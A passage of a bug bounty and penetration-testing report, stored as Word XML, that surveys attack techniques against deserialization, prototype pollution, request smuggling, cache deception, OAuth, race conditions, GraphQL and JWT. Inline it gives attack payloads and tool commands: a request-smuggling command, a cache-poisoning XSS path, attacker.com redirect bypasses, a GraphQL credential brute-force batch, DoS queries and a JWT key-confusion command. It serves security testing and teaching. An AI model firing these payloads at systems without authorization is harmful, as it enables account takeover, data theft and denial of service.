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B6E748" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t># Advanced Bug Bounty Vulnerability Analysis and Penetration Testing Methods (2023-2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D37AEA" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="731F40F7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Comprehensive analysis reveals 40,000+ CVEs disclosed in 2024 alone (38% increase), with 75 zero-days exploited and a dramatic shift toward enterprise technology targeting.** Modern bug bounty hunters face an evolving landscape where traditional attack vectors merge with emerging threats in LLM/AI systems, serverless architectures, and cloud-native platforms. This report synthesizes cutting-edge exploitation techniques, recent CVEs, and practical methodologies across 30+ vulnerability classes, providing actionable intelligence for security researchers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C3B65" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="1D4F4851" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Advanced deserialization attacks resurge despite modern protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05960EDD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="68C4FA0B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>Java deserialization remains a critical vulnerability class in 2024-2025, with **CVE-2023-26360** (Adobe ColdFusion, CVSS 9.8) and **CVE-2023-22527** (Atlassian Confluence, CVSS 10.0) demonstrating continued real-world exploitation. The landscape has evolved significantly with Java 17+ implementing module encapsulation, requiring updated attack techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B955F4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4C23694D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Modern exploitation requires bypassing Java 17 restrictions.** The AspectJWeaver gadget chain continues working on Java 17+, while traditional CommonCollections chains face limitations. Attackers now use `--add-opens` flags or alternative chains like FileUpload1 when dependencies permit. The ysoserial tool provides 46+ gadget chains, with CommonsCollections1-7, Spring1-2, BeanShell1, and Groovy1 remaining popular choices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058B8BE3" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="55823FEE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Practical exploitation follows a consistent pattern:** Entry points through `readObject()` methods chain through intermediate gadgets before reaching sinks like `Runtime.exec()` or `TemplatesImpl.getOutputProperties()`. Detection relies on magic byte signatures: Java serialization begins with `AC ED 00 05`, .NET BinaryFormatter with `00 01 00 00 00 FF FF FF FF`, and Python pickle with `80 03`. Modern bug bounty hunters should focus on upload functionalities accepting serialized data, particularly in enterprise Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DB7DB5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7F723FF9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Recent PHP exploitation through CVE-2024-2961** demonstrates the glibc iconv vulnerability bypassing PHP 8+ deserialization protections, expanding the attack surface beyond traditional Java targets. Tools like ysoserial, ysoserial.net, gadgetinspector, and marshalsec provide comprehensive exploitation capabilities across multiple serialization formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D2EA4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5DC32045" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Prototype pollution evolves into critical server-side threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9D6FA" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7178FB7A" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>JavaScript prototype pollution has transitioned from a client-side nuisance to a **critical server-side vulnerability enabling remote code execution** in Node.js environments. The vulnerability count exploded in 2024-2025, with CVE-2024-21505 (web3-utils), CVE-2024-21529 (dset), CVE-2024-21548 (Bun runtime), and CVE-2024-54152 (angular-expressions) affecting widely-deployed packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49545C2C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4460F0B5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Server-side exploitation centers on polluting Object.prototype** through vulnerable merge, clone, or path-setting functions. Attackers inject properties via `__proto__`, `constructor.prototype`, or `constructor['prototype']` keys in JSON payloads. Once pollution succeeds, gadget chains in Node.js standard library or popular npm packages convert property pollution into command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF18BC" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3664BAFD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Command execution gadgets target child process spawning.** The `child_process.fork()` function respects polluted `execArgv` properties, enabling execution via `--eval` flags. Similarly, `execSync()` checks polluted `shell` and `input` properties, allowing attacks through alternative shells like vim with command injection. Environment variable pollution through `NODE_OPTIONS` can inject `--inspect` flags pointing to attacker-controlled debuggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51665BD1" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5EDD4DF2" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Detection employs multiple techniques.** Polluted property reflection tests inject test properties and observe if they appear in responses. Status code override attempts pollute HTTP status codes (400-599 range) and check server responses. JSON spaces override exploits Express.js \u003c4.17.4 by polluting the `json spaces` property, causing observable indentation changes. Charset override injects UTF-7 encoding to enable XSS via polluted Content-Type headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0421C4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="189048C7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Tools have matured significantly.** DOM Invader (built into Burp Suite browser) provides automatic client-side detection. PP-Finder offers command-line scanning via `npm install -g pp-finder`. The Server-Side Prototype Pollution Scanner Burp extension and Prototype Pollution Gadgets Finder (Doyensec) with auto-reversion capabilities enable practical testing. Bug bounty hunters should prioritize Node.js APIs accepting user-controlled objects, particularly admin panels and configuration endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244B569" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="50F0630C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## HTTP request smuggling intensifies with HTTP/2 downgrade attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31149E66" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="7F0D7D20" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>HTTP request smuggling experienced a resurgence in 2023-2024 through **HTTP/2 downgrade attacks**, creating new exploitation vectors when HTTP/2 front-ends communicate with HTTP/1.1 back-ends. The H2.CL and H2.TE attack variants exploit parsing differences between protocol versions, with response queue poisoning enabling session token theft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43863F2B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="103228EB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Classic CL.TE and TE.CL variants remain effective.** When front-ends use Content-Length and back-ends use Transfer-Encoding (CL.TE), attackers craft requests with both headers, causing desynchronization. The reverse (TE.CL) exploits front-ends preferring Transfer-Encoding while back-ends honor Content-Length. TE.TE attacks use header obfuscation like `Transfer-Encoding: chunked, identity` or mixed-case `ChUnKeD` to cause inconsistent parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58801B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3137899D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**HTTP/2-specific attacks leverage downgrade scenarios.** H2.CL attacks send HTTP/2 requests with Content-Length: 0 followed by HTTP/1.1 request data in the body. When downgraded, this smuggles a second request through the front-end. H2.TE attacks inject CRLF sequences in HTTP/2 headers (e.g., Custom-Header with embedded `\r\n` sequences), which become meaningful in HTTP/1.1 after downgrade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA724FA" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="39425599" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Response queue poisoning represents the highest-impact exploitation.** Attackers smuggle requests that remain in the server's processing queue, causing the next legitimate user's response to be misdirected to the attacker. This exposes session cookies, API keys, and sensitive data without requiring user interaction. Recent CVEs include **CVE-2023-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>25690** (Apache mod_proxy), **CVE-2023-25950** (HAProxy 2.7/2.6), and **CVE-2022-41721** (Go MaxBytesHandler).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DAB310" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2114368B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Detection and exploitation tools have advanced significantly.** The HTTP Request Smuggler Burp extension provides automatic passive scanning, Turbo Intruder integration, and auto-smuggle features. The standalone smuggler.py tool enables command-line testing: `python3 smuggler.py -u https://target.com`. For HTTP/2 cleartext attacks, h2cSmuggler offers specialized capabilities: `python3 h2csmuggler.py -u https://target.com -x 'GET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n'`. Bug bounty hunters should target CDN-backed applications with HTTP/2 front-ends and legacy HTTP/1.1 origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D4226" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="235F6281" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Web cache deception exploits parser discrepancies across 74% of major sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52B945" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="099A4DB5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**PortSwigger's 2024 research reveals 74% of Alexa Top 1K sites vulnerable** to web cache deception and poisoning attacks, affecting all major CDNs including Cloudflare, CloudFront, Azure, Akamai, Fastly, and Google Cloud. The attacks exploit discrepancies between cache and origin server URL parsing, using custom delimiters, encoding variations, and normalization differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3D0B9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="4A8B3D58" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Static extension exploitation forms the foundation.** Attackers craft URLs like `/myAccount$.css` where the cache sees `/myAccount.css` (static, cacheable) but the origin processes `/myAccount` (dynamic, sensitive). Custom delimiters vary by framework: semicolons (`;`) for PHP and ASP.NET, dollar signs (`$`) for Ruby on Rails, hashes (`#`) for various parsers, and backslashes (`\`) for Windows IIS. After a victim visits the crafted URL, their sensitive account data becomes cached and accessible to attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD47C9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2A77DCA9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Static directory with normalization attacks add sophistication.** URLs like `/myAccount$%2e%2e%2fstatic/file.js` exploit different normalization stages—caches normalize to `/static/file.js` (matching static rules) while origins see `/myAccount` (returning dynamic content). Encoded delimiter bypass uses sequences like </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>`/myAccount%23/resources/style.css` where caches decode and normalize differently than origin servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535915C9" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="1BA5AA6C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Cache poisoning converts XSS into persistent attacks.** URL paths containing XSS payloads like `/\u003cscript\u003ealert(1)\u003c/script\u003e/../../../home` normalize to `/home` for cache keys but trigger reflected XSS at the origin, poisoning the cached response at `/home`. Azure-specific fragment-based attacks use URLs like `/poisoned#/../legitEndpoint` where Azure normalizes hash characters as delimiters, enabling arbitrary cache key manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87A203" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="175F3073" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Detection requires specialized tools.** Param Miner (Burp) identifies cache keys and unkeyed inputs through intelligent fuzzing. The toxicache Golang scanner automates detection across multiple attack types. Bug bounty hunters should prioritize testing CloudFlare + Nginx/Apache combinations, CloudFront + IIS (backslash conversion vulnerabilities), and Azure (normalizes by default), focusing on authenticated endpoints returning user-specific data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D259B6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="55C85BDB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## OAuth and OpenID Connect authentication bypasses persist across implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278B801" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="6C37B0DD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>OAuth 2.0 and OpenID Connect vulnerabilities remain **prevalent in 2024-2025** despite standardization efforts, with redirect URI validation bypasses, state parameter attacks, and token manipulation enabling account takeovers. Recent CVEs include **CVE-2024-45409** (Ruby SAML, CVSS 9.8) for XML Signature Wrapping bypasses and **CVE-2024-58248** (nopCommerce) for race conditions in token validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F88F876" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="34B0A01C" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Redirect URI validation bypasses exploit parser weaknesses.** Common patterns include subdomain confusion (`https://victim.com.attacker.com`, `https://victim.comattacker.com`), @ symbol exploitation (`https://victim.com@attacker.com`), and browser-specific bypasses like Safari's backtick handling (`http://victim.com%60.attacker.net`) or Firefox/Chrome's underscore tricks (`http://victim.com_.attacker.net`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB1275" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="19000CDD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**State parameter vulnerabilities enable CSRF attacks.** Omitting the state parameter entirely removes CSRF protection. State fixation uses attacker-controlled values, while state prediction exploits weak randomness. PKCE (Proof Key for Code Exchange) bypass attempts remove `code_challenge` parameters or exploit missing enforcement. Fragment token theft via JavaScript (`window.location.hash`) remains effective against implicit flow implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA4597" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="694C7A62" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Token manipulation techniques target validation logic.** Issuer-mismatch vulnerabilities (IBM Verify, Apache APISIX 2024-2025) accept tokens from unintended authorization servers. Sign in with Apple's historical token validation flaw demonstrated critical implementation errors in major providers. Testing should systematically attempt redirect URI bypasses, state manipulation, PKCE removal, and token replay across different OAuth flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFFB36" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="385518E4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Real bug bounty reports demonstrate impact.** HackerOne #426147 (Niche.co) combined CORS misconfiguration with dynamic origin reflection and credentials, enabling full account takeover. Bug bounty hunters should focus on OAuth callback handlers, testing parser inconsistencies between validation and redirect logic, and examining token validation timing for race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8A73D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="6824A2C7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## Race conditions exploit HTTP/2 single-packet attacks for reliable exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085A167" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="018DE8F4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>Race condition exploitation **advanced dramatically with HTTP/2 single-packet attack techniques**, enabling reliable exploitation of time-of-check to time-of-use (TOCTOU) vulnerabilities. The HTTP/2 protocol's multiplexing allows multiple requests within a single TCP packet, creating truly simultaneous server-side processing that bypasses traditional timing defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E87C5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="601B7412" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t xml:space="preserve">**Turbo Intruder revolutionized exploitation through HTTP/2 support.** The tool's `Engine.BURP2` mode with `concurrentConnections=1` sends requests over a single HTTP/2 connection. Queueing 20-50 requests to a `gate` and releasing simultaneously via `openGate()` creates microsecond-level synchronization. This technique proved </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>successful against coupon code redemption, gift card applications, email verification bypasses, and premium feature unlocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1840C43D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="07B508A4" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**HTTP/3 last-frame synchronization represents cutting-edge methodology.** Tools like h3spacex enable QUIC-based HTTP/3 exploitation with precise frame timing control. The `SendRequestsWithLastFrameSynchronizationMethod()` function queues requests and releases them synchronized to the final frame transmission, achieving even tighter timing windows than HTTP/2 methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719430F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2F2E7B3B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Email verification bypass demonstrates practical exploitation.** Attackers initiate email changes to attacker-controlled addresses while simultaneously sending 49 verification requests with empty or invalid tokens. Race condition windows of \u003c10ms enable bypassing verification requirements, as servers process the change before completing validation. Similar patterns affect multi-factor authentication enrollment, password reset flows, and access control checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A45AD" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="478FBD03" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**CVE-2022-4037** (GitLab) exemplifies high-impact discoveries—race conditions in email verification enabled OAuth account takeovers. HackerOne reports document gift card redemption exploits (report #759247, Reverb.com) and group removal bypasses (#604534). Medium.com paid $500 for insurance profile creation race conditions. Burp Repeater's "Send group in parallel (single packet attack)" feature democratized exploitation, though Turbo Intruder remains superior for complex scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052FAA6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="3A6694FC" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Detection focuses on state-changing operations.** Target endpoints handling financial transactions (payments, refunds, transfers), discount/coupon applications, voting/rating systems, verification code processing, and account privilege modifications. Testing methodology involves identifying state transitions, crafting 20-100 identical requests, using HTTP/2 single-connection exploitation, and analyzing responses for anomalies like duplicate transactions or inconsistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E69EE" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="02E295E6" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## GraphQL vulnerabilities enable introspection abuse and DoS attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D4224" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="30FF31A7" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GraphQL security issues **affect 69% of GraphQL APIs susceptible to DoS** according to 2024 security statistics, with introspection enabled on 50% of production endpoints and 4,000+ secrets exposed in responses. The 13,720 total security issues found across analyzed APIs highlight systemic problems in GraphQL implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4920A497" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="0457154B" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Introspection abuse remains the primary reconnaissance vector.** The standard introspection query `{__schema{queryType{name}mutationType{name}types{kind name fields{name args{name type{name}}type{name kind}}}}}` reveals complete schema structure including hidden queries, mutations, and types. Bypass techniques for disabled introspection include newline injection (`query {\n  __schema\n  {types{name}}\n}`), mixed case (`__Schema`), and tab character insertion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD888F5" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="5D0AE702" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Batching attacks bypass rate limiting and enable credential stuffing.** Attackers submit arrays of mutation requests like `[{"query":"mutation{login(user:\"admin\",pass:\"pass1\"){token}}"},{"query":"mutation{login(user:\"admin\",pass:\"pass2\"){token}}"}, ...]` with thousands of variations. Single responses contain success indicators for valid credentials. Alias-based DoS uses patterns like `user1: getUser(id:1) {name email} user2: getUser(id:2) {name email}` repeated 10,000 times, overwhelming servers through computational exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D26ED" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="58DAF47D" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Field duplication exploits query cost calculation failures.** Responses balloon when attackers request `id id id id...` (repeated 50,000 times) for each field. Depth limit bypasses use recursive nesting: `user(id:1){posts{author{posts{author{posts{id}}}}}}` continuing to 100+ levels, circumventing basic depth restrictions through relationship traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E2478F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="1DE02539" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Recent CVEs highlight ongoing risks.** CVE-2024-50312 (CVSS 7.5) enabled improper access controls on introspection. CVE-2025-53364 (Parse Server) exposed public schema access without authentication. CVE-2023-38503 (Directus) demonstrated subscription permission bypasses. CVE-2023-34047 (Spring GraphQL) involved batch loader context confusion. Financial services showed the highest vulnerability density in 2024 analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00C13E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="27023095" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Exploitation tools have matured significantly.** InQL Scanner (CLI: `python inql.py -t https://target.com/graphql -o schema.json` or Burp extension) automates schema discovery. Clairvoyance performs wordlist-based field enumeration: `clairvoyance https://target.com/graphql -w wordlist.txt -o schema.json`. GraphQL-Cop tests for batch and DoS attacks: `graphql-cop -t https://target.com/graphql --batch-attacks --dos-attacks`. GraphW00f fingerprints implementations: `graphw00f -t https://target.com/graphql`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E7B6E" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="38A1E063" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>## JWT attacks leverage algorithm confusion and header injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3529FCFF" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="26DBA3F8" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>JSON Web Token vulnerabilities **persist across implementations** despite widespread awareness, with algorithm confusion, signature verification bypasses, and header injection enabling authentication bypasses. CVE-2024-54150 (cjwt) and CVE-2021-46743 (firebase/php-jwt) demonstrate continued discoveries of fundamental flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532E390F" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC"/>
    <w:p w14:paraId="2F4FD7BB" w14:textId="77777777" w:rsidR="001544AC" w:rsidRDefault="001544AC" w:rsidP="001544AC">
      <w:r>
        <w:t>**Algorithm confusion attacks (RS256→HS256) exploit verification logic.** Attackers obtain the public key from JWKS endpoints (`/.well-known/jwks.json`) or certificate extraction via `openssl s_client`. The public key, intended for RS256 signature verification, becomes the HMAC secret for HS256 signing when implementations fail to validate algorithm headers. Python's jwt library enables exploitation: `jwt.encode(payload, public_key, algorithm="HS256")`. The jwt_tool automates this: `python3 jwt_tool.py JWT_HERE -X k -pk pubkey.pem`.</w:t>
      </w:r>
    </w:p>
